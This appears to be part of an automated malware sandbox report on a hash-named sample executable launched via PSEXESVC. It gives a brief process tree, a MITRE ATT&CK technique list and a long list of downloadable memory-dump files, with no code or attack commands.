C:\Windows\PSEXESVC.exe
1⤵
PID:2912

C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
"714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
2⤵
PID:800

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:4280

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1232

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/384-172-0x0000000000000000-mapping.dmp

Download
memory/424-123-0x0000000000000000-mapping.dmp

Download
memory/740-146-0x0000000000000000-mapping.dmp

Download
memory/800-225-0x0000000004550000-0x0000000004551000-memory.dmp

Filesize
4KB

Download
memory/804-129-0x0000000000000000-mapping.dmp

Download
memory/940-223-0x0000024B79C03000-0x0000024B79C05000-memory.dmp

Filesize
8KB

Download
memory/940-220-0x0000024B79C00000-0x0000024B79C02000-memory.dmp

Filesize
8KB

Download
memory/940-228-0x0000024B7C120000-0x0000024B7C121000-memory.dmp

Filesize
4KB

Download
memory/940-255-0x0000024B79C07000-0x0000024B79C09000-memory.dmp

Filesize
8KB

Download
memory/940-254-0x0000024B79C05000-0x0000024B79C06000-memory.dmp

Filesize
4KB

Download
memory/1076-188-0x0000000006B50000-0x0000000006B51000-memory.dmp

Filesize
4KB

Download
memory/1076-189-0x0000000006BF0000-0x0000000006BF1000-memory.dmp

Filesize
4KB

Download
memory/1076-191-0x0000000007570000-0x0000000007571000-memory.dmp

Filesize
4KB

Download
memory/1076-192-0x0000000006D20000-0x0000000006D21000-memory.dmp

Filesize
4KB

Download
memory/1076-187-0x0000000006F40000-0x0000000006F41000-memory.dmp

Filesize
4KB

Download
memory/1076-193-0x0000000007E20000-0x0000000007E21000-memory.dmp

Filesize
4KB

Download
memory/1076-194-0x0000000007BF0000-0x0000000007BF1000-memory.dmp

Filesize
4KB

Download
memory/1076-206-0x0000000006903000-0x0000000006904000-memory.dmp

Filesize
4KB

Download
memory/1076-186-0x0000000006902000-0x0000000006903000-memory.dmp

Filesize
4KB

Download
memory/1076-185-0x0000000006900000-0x0000000006901000-memory.dmp

Filesize
4KB

Download
memory/1076-184-0x0000000000C60000-0x0000000000C61000-memory.dmp

Filesize
4KB

Download
memory/1092-148-0x0000000000000000-mapping.dmp

Download
memory/1192-166-0x0000000000000000-mapping.dmp

Download
memory/1232-145-0x0000000000000000-mapping.dmp

Download
memory/1232-168-0x0000000000000000-mapping.dmp

Download
memory/1280-135-0x0000000000000000-mapping.dmp

Download
memory/1348-128-0x0000000000000000-mapping.dmp

Download
memory/1432-118-0x0000000000000000-mapping.dmp

Download
memory/1580-177-0x0000000000000000-mapping.dmp

Download
memory/1652-140-0x0000000000000000-mapping.dmp

Download
memory/1680-179-0x0000000000000000-mapping.dmp

Download
memory/1744-117-0x0000000005950000-0x0000000005951000-memory.dmp

Filesize
4KB

Download
memory/1744-116-0x0000000005840000-0x0000000005841000-memory.dmp

Filesize
4KB

Download
memory/1744-114-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

Filesize
4KB

Download
memory/1768-181-0x0000000000000000-mapping.dmp

Download
memory/1768-125-0x0000000000000000-mapping.dmp

Download
memory/1792-170-0x0000000000000000-mapping.dmp

Download
memory/1840-151-0x0000000000000000-mapping.dmp

Download
memory/1936-237-0x000001F675CB0000-0x000001F675CB1000-memory.dmp

Filesize
4KB

Download
memory/1936-227-0x000001F659C23000-0x000001F659C25000-memory.dmp

Filesize
8KB

Download
memory/1936-248-0x000001F675C70000-0x000001F675C71000-memory.dmp

Filesize
4KB

Download
memory/1936-224-0x000001F659C20000-0x000001F659C22000-memory.dmp

Filesize
8KB

Download
memory/1936-251-0x00007FF6B8BC0000-0x00007FF6B8BC1000-memory.dmp

Filesize
4KB

Download
memory/1936-256-0x000001F659C25000-0x000001F659C26000-memory.dmp

Filesize
4KB

Download
memory/1936-257-0x000001F659C27000-0x000001F659C29000-memory.dmp

Filesize
8KB

Download
memory/1956-126-0x0000000000000000-mapping.dmp

Download
memory/1956-209-0x000000001B7F0000-0x000000001B7F2000-memory.dmp

Filesize
8KB

Download
memory/1956-207-0x00000000009A0000-0x00000000009A1000-memory.dmp

Filesize
4KB

Download
memory/2100-156-0x0000000000000000-mapping.dmp

Download
memory/2136-138-0x0000000000000000-mapping.dmp

Download
memory/2152-167-0x0000000000000000-mapping.dmp

Download
memory/2168-139-0x0000000000000000-mapping.dmp

Download
memory/2208-165-0x0000000000000000-mapping.dmp

Download
memory/2268-171-0x0000000000000000-mapping.dmp

Download
memory/2312-180-0x0000000000000000-mapping.dmp

Download
memory/2452-127-0x0000000000000000-mapping.dmp

Download
memory/2700-175-0x0000000000000000-mapping.dmp

Download
memory/2704-131-0x0000000000000000-mapping.dmp

Download
memory/2712-176-0x0000000000000000-mapping.dmp

Download
memory/2736-159-0x0000000000000000-mapping.dmp

Download
memory/2784-157-0x0000000000000000-mapping.dmp

Download
memory/2836-150-0x0000000000000000-mapping.dmp

Download
memory/2840-269-0x000001DC39310000-0x000001DC39312000-memory.dmp

Filesize
8KB

Download
memory/2840-299-0x000001DC39318000-0x000001DC39319000-memory.dmp

Filesize
4KB

Download
memory/2840-287-0x000001DC39316000-0x000001DC39318000-memory.dmp

Filesize
8KB

Download
memory/2840-271-0x000001DC39313000-0x000001DC39315000-memory.dmp

Filesize
8KB

Download
memory/3044-178-0x0000000000000000-mapping.dmp

Download
memory/3132-121-0x0000000000000000-mapping.dmp

Download
memory/3136-153-0x0000000000000000-mapping.dmp

Download
memory/3168-266-0x000001DF30150000-0x000001DF30152000-memory.dmp

Filesize
8KB

Download
memory/3168-298-0x000001DF30158000-0x000001DF30159000-memory.dmp

Filesize
4KB

Download
memory/3168-268-0x000001DF30153000-0x000001DF30155000-memory.dmp

Filesize
8KB

Download
memory/3168-286-0x000001DF30156000-0x000001DF30158000-memory.dmp

Filesize
8KB

Download
memory/3172-137-0x0000000000000000-mapping.dmp

Download
memory/3196-155-0x0000000000000000-mapping.dmp

Download
memory/3196-144-0x0000000000000000-mapping.dmp

Download
memory/3332-120-0x0000000000000000-mapping.dmp

Download
memory/3332-149-0x0000000000000000-mapping.dmp

Download
memory/3480-161-0x0000000000000000-mapping.dmp

Download
memory/3480-174-0x0000000000000000-mapping.dmp

Download
memory/3480-119-0x0000000000000000-mapping.dmp

Download
memory/3576-154-0x0000000000000000-mapping.dmp

Download
memory/3636-134-0x0000000000000000-mapping.dmp

Download
memory/3828-160-0x0000000000000000-mapping.dmp

Download
memory/3860-141-0x0000000000000000-mapping.dmp

Download
memory/3860-130-0x0000000000000000-mapping.dmp

Download
memory/3872-124-0x0000000000000000-mapping.dmp

Download
memory/3876-169-0x0000000000000000-mapping.dmp

Download
memory/3904-132-0x0000000000000000-mapping.dmp

Download
memory/3904-142-0x0000000000000000-mapping.dmp

Download
memory/3928-163-0x0000000000000000-mapping.dmp

Download
memory/3932-158-0x0000000000000000-mapping.dmp

Download
memory/3936-136-0x0000000000000000-mapping.dmp

Download
memory/3936-164-0x0000000000000000-mapping.dmp

Download
memory/3944-173-0x0000000000000000-mapping.dmp

Download
memory/3944-162-0x0000000000000000-mapping.dmp

Download
memory/3964-147-0x0000000000000000-mapping.dmp

Download
memory/3968-143-0x0000000000000000-mapping.dmp

Download
memory/3972-133-0x0000000000000000-mapping.dmp

Download
memory/4008-152-0x0000000000000000-mapping.dmp

Download
memory/4040-122-0x0000000000000000-mapping.dmp

Download
memory/4140-276-0x0000020A98713000-0x0000020A98715000-memory.dmp

Filesize
8KB

Download
memory/4140-273-0x0000020A98710000-0x0000020A98712000-memory.dmp

Filesize
8KB

Download
memory/4140-292-0x0000020A98716000-0x0000020A98718000-memory.dmp

Filesize
8KB

Download
memory/4140-305-0x0000020A98718000-0x0000020A98719000-memory.dmp

Filesize
4KB

Download
memory/4208-291-0x000001CEB0B06000-0x000001CEB0B08000-memory.dmp

Filesize
8KB

Download
memory/4208-302-0x000001CEB0B08000-0x000001CEB0B09000-memory.dmp

Filesize
4KB

Download
memory/4208-277-0x000001CEB0B00000-0x000001CEB0B02000-memory.dmp

Filesize
8KB

Download
memory/4208-278-0x000001CEB0B03000-0x000001CEB0B05000-memory.dmp

Filesize
8KB

Download
memory/4372-294-0x000001DD74A88000-0x000001DD74A89000-memory.dmp

Filesize
4KB

Download
memory/4372-258-0x000001DD74A80000-0x000001DD74A82000-memory.dmp

Filesize
8KB

Download
memory/4372-259-0x000001DD74A83000-0x000001DD74A85000-memory.dmp

Filesize
8KB

Download
memory/4372-282-0x000001DD74A86000-0x000001DD74A88000-memory.dmp

Filesize
8KB

Download
memory/4460-295-0x000001B1B9238000-0x000001B1B9239000-memory.dmp

Filesize
4KB

Download
memory/4460-261-0x000001B1B9233000-0x000001B1B9235000-memory.dmp

Filesize
8KB

Download
memory/4460-260-0x000001B1B9230000-0x000001B1B9232000-memory.dmp

Filesize
8KB

Download
memory/4460-283-0x000001B1B9236000-0x000001B1B9238000-memory.dmp

Filesize
8KB

Download
memory/4572-264-0x000002713A7D0000-0x000002713A7D2000-memory.dmp

Filesize
8KB

Download
memory/4572-285-0x000002713A7D6000-0x000002713A7D8000-memory.dmp

Filesize
8KB

Download
memory/4572-297-0x000002713A7D8000-0x000002713A7D9000-memory.dmp

Filesize
4KB

Download
memory/4572-265-0x000002713A7D3000-0x000002713A7D5000-memory.dmp

Filesize
8KB

Download
memory/4648-263-0x0000020B71553000-0x0000020B71555000-memory.dmp

Filesize
8KB

Download
memory/4648-262-0x0000020B71550000-0x0000020B71552000-memory.dmp

Filesize
8KB

Download
memory/4648-296-0x0000020B71558000-0x0000020B71559000-memory.dmp

Filesize
4KB

Download
memory/4648-284-0x0000020B71556000-0x0000020B71558000-memory.dmp

Filesize
8KB

Download
memory/4700-303-0x00000140F1598000-0x00000140F1599000-memory.dmp

Filesize
4KB

Download
memory/4700-293-0x00000140F1596000-0x00000140F1598000-memory.dmp

Filesize
8KB

Download
memory/4700-280-0x00000140F1590000-0x00000140F1592000-memory.dmp

Filesize
8KB

Download
memory/4700-281-0x00000140F1593000-0x00000140F1595000-memory.dmp

Filesize
8KB

Download
memory/4928-279-0x00000211D0A83000-0x00000211D0A85000-memory.dmp

Filesize
8KB

Download
memory/4928-300-0x00000211D0A88000-0x00000211D0A89000-memory.dmp

Filesize
4KB

Download
memory/4928-272-0x00000211D0A80000-0x00000211D0A82000-memory.dmp

Filesize
8KB

Download
memory/4928-288-0x00000211D0A86000-0x00000211D0A88000-memory.dmp

Filesize
8KB

Download
memory/4988-267-0x000002CFFF350000-0x000002CFFF352000-memory.dmp

Filesize
8KB

Download
memory/4988-270-0x000002CFFF353000-0x000002CFFF355000-memory.dmp

Filesize
8KB

Download
memory/4988-301-0x000002CFFF358000-0x000002CFFF359000-memory.dmp

Filesize
4KB

Download
memory/4988-289-0x000002CFFF356000-0x000002CFFF358000-memory.dmp

Filesize
8KB

Download
memory/5104-290-0x000002A1770D6000-0x000002A1770D8000-memory.dmp

Filesize
8KB

Download
memory/5104-275-0x000002A1770D3000-0x000002A1770D5000-memory.dmp

Filesize
8KB

Download
memory/5104-304-0x000002A1770D8000-0x000002A1770D9000-memory.dmp

Filesize
4KB

Download
memory/5104-274-0x000002A1770D0000-0x000002A1770D2000-memory.dmp

Filesize
8KB

Download